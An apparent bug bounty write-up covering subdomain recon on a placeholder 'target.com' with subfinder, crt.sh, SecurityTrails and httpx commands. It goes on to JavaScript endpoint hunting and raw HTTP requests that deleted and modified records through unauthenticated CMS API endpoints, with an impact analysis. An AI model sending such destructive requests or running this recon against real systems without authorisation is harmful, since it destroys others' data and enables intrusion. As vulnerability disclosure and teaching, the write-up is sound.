Missing authentication in API Endpoints lead to update orders and Bulk deletion in CMS web app, From Recon.

  • First i Start with Recon, by using the tools to subdomain enumeration from projectdiscovery:

ProjectDiscovery

Monitor your infrastructure. Real vulnerabilities. Zero noise. - ProjectDiscovery

github.com

[ run subfinder with the root domain ]

subfinder -d target.com -all -recursive -o subfinder.txt

[ and run it again, after collect the wildcard subdomains form https://crt.sh/ ]

subfinder -dL subdomains_from_crt.txt -all -recursive -o 2subfinder.txt
  • and with other tools like:

GitHub - owasp-amass/amass: In-depth attack surface mapping and asset discovery

In-depth attack surface mapping and asset discovery - owasp-amass/amass

github.com

GitHub - blacklanternsecurity/bbot: The recursive internet scanner for hackers. 🧡

he recursive internet scanner for hackers. 🧡. Contribute to blacklanternsecurity/bbot development by creating an…gi

github.com

GitHub - tomnomnom/assetfinder: Find domains and subdomains related to a given domain

Find domains and subdomains related to a given domain - tomnomnom/assetfinder

github.com

GitHub - rix4uni/subdog: A powerful subdomain enumeration tool that aggregates data from multiple…

A powerful subdomain enumeration tool that aggregates data from multiple sources to create comprehensive lists of root…

github.com
  • with this commands also to get more resulsts :
curl -s -H "APIKEY: <YOUR API KEY>" -H "Accept: application/json" \
  "https://api.securitytrails.com/v1/domain/target.com/subdomains?limit=50000" \
  | jq -r '.subdomains // [] | .[] | "\(.).target.com"' \
  | sort -u \
  | tee securitytrails.txt
curl -s "https://crt.sh/?q=%25.target.com&output=json" \
  | jq -r '.[]?.name_value' \
  | sed 's/\*\.//g' \
  | sort -u \
  | tee crtsh_subs.txt
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" \
  | sort \
  | sed -E 's|http?://([^/]+).*|\1|' \
  | sort -u \
  | tee wayback.txt
curl -s 'https://subdomainfinder.c99.nl/scans/2025-12-29/<target.com>' \
   | grep -Eo '([A-Za-z0-9_-]+\.)+target\.com' \
   | sort -u \
   | tee c99.txt

NOTE: you need to go https://subdomainfinder.c99.nl/ and doing a fresh scan then get the link and put here in the command to work without any error, and get the fresh results, and you doing the same step to get the ips for the subdomain's by using this command:

curl -s 'https://subdomainfinder.c99.nl/scans/2025-12-29/target.com' \
  | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' \
  | sort -u \
  | tee c99_ips.txt
  • that's all the useful command you can use, of course with google,and github dorking with "Brand-Related Keywords" you will get more useful results, anther resources ?
https://api.subdomain.center/?domain=target.com
https://api.hackertarget.com/hostsearch/?q=target.com
https://anubisdb.com/anubis/subdomains/target.com
https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names
https://urlscan.io/api/v1/search/?q=domain:target.com
virustotal.com/vtapi/v2/domain/report?apikey=<YOUR API KEY>&domain=target.com
https://app.netlas.io/domains/
  • after i collect the subdomains, and sort them, i love to collect and start with js files, but this time i use this command to filiter them by httpx and not start with js.
httpx -list allsubs.txt -status-code -content-length -content-type -line-count -title -body-preview -server -tech-detect -probe-all-ips -include-response -follow-host-redirects -random-agent -o httpx.txt
  • with take a look in the results, and start open one by one, i found subdomain return 200 called:
expert-cms-something.something-something.target.com
  • looks like intereste, i open this subodmain, and i open the dev tool in my browser also, if you not knows how to deal with dev tools, watch this vedio: https://youtu.be/Y1S5s3FmFsI?si=6fP5L352YGf9jNy1
  • and i usually using dev tool to searhing in the js files with keywords, like:
method:
http.post
http.get
http.put

path:"
herf:"
ref.indexOf('/
.post("
.get("


and so on <i will write about my metho on js hunting >

until i found a lot of api paht's with different HTTP methods, backing to my repeater to make the HTTP request, i start with this path called `/api/DeleteItems/` with POST method, i made this HTTP request:

POST /api/DeleteItems/ HTTP/2
Host: expert-cms-something.something-something.target.com
Content-Type: application/json
{}
  • with tracking the error message in the response, the final HTTP request was being like that
POST /api/DeleteItems/ HTTP/2
Host: expert-cms-something.something-something.target.com
Content-Type: application/json
{
"order": "232",
"Ids": [101003]
}
  • i get this response:
Response

{"success":true,"message":null,"items":null}
None

wow, what's happing here ?? 200 ok, where is the authentiaction here ? the HTTP request really used for the Delete Items, and without authentiaction !!!

backing to the anther api endpoints i found,

  • with the same method in the previous creating HTTP requset, with tracking error messages in the respones also but this time with PUT request method `/api/updateorder/`, the second request had being like that,
PUT /api/updateorder/101003 HTTP/2
Host: expert-cms-something.something-something.target.com
  • i get the same response
{"success":true,"message":null,"items":null}
None
  • in this moment i wasn't understand what i am really doing, but i am have anther api path i found in the same js file, called `/api/delete/` with DELETE method, i create a HTTP request and put a random number after the path to be like:
DELETE /api/delete/101013 HTTP/2
Host: expert-cms-something.something-something.target.com
  • response
{"success":true,"message":null,"items":null}
  • i send this request twice !!! so i can see it's false postive? or i am really able to Delete it !!! Send this request again return me this response:
{"success": false, "message": "Object reference not set to an instance of an object.", "items": null}
None

1- bulk deletion by using the POST request

This endpoint allows an attacker to delete multiple CMS records in a single request.

2- updating orders

This allows arbitrary modification of CMS data without authentication.

3- single deleting

This endpoint allows permanent deletion of individual CMS records by ID.

why this happend ?

  • Missing authentication middleware on CMS API routes
  • No authorization checks validating user permissions
  • Internal CMS endpoints exposed to the public internet

Impact

An unauthenticated attacker can:

  • Modify CMS records
  • Delete individual records
  • Perform bulk deletion of multiple records

Real-World Risk

  • Permanent loss of critical CMS data
  • Disruption of core business workflows
  • Integrity and availability compromise
  • Financial and reputational damage

This represents a Critical severity issue due to unauthenticated access to destructive production functionality.

after report it and start with FUZZING every place in this subdomain, i get "dev" subdomain, and found the same api endpoints, with the same results, i didn't report it in anther submission for this reasons, and it will close duplicte.

None
  • after one week, the team accept it only as a P2 with maximum bounty in P2.
None

alhamdulillah.

that's all for today, wait the next one. and you can follow me on x

JavaScript is not available.

Edit description

x.com

thx you, and i hope you learn something help you.